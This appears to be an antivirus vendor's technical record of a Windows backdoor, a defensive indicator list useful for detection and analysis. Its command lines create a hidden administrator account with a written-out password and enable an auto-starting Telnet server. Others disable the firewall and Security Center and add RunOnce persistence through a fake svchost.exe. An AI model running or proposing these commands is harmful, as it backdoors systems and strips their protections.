Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'Driver' = '<SYSTEM32>\Sys\svchost.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Enter /t REG_DWORD /d 0 /f
- <SYSTEM32>\sc.exe start tlntsvr
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\net1.exe localgroup Администраторы login /add
- <SYSTEM32>\net1.exe user Enter vertical /add /expires:never /times:all
- <SYSTEM32>\sc.exe config SharedAccess start= disabled
- <SYSTEM32>\sc.exe config wscsvc start= disabled
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v Driver /t REG_SZ /d <SYSTEM32>\Sys\svchost.exe /f
- <SYSTEM32>\sc.exe stop SharedAccess
- <SYSTEM32>\sc.exe stop wscsvc
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- 'localhost':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''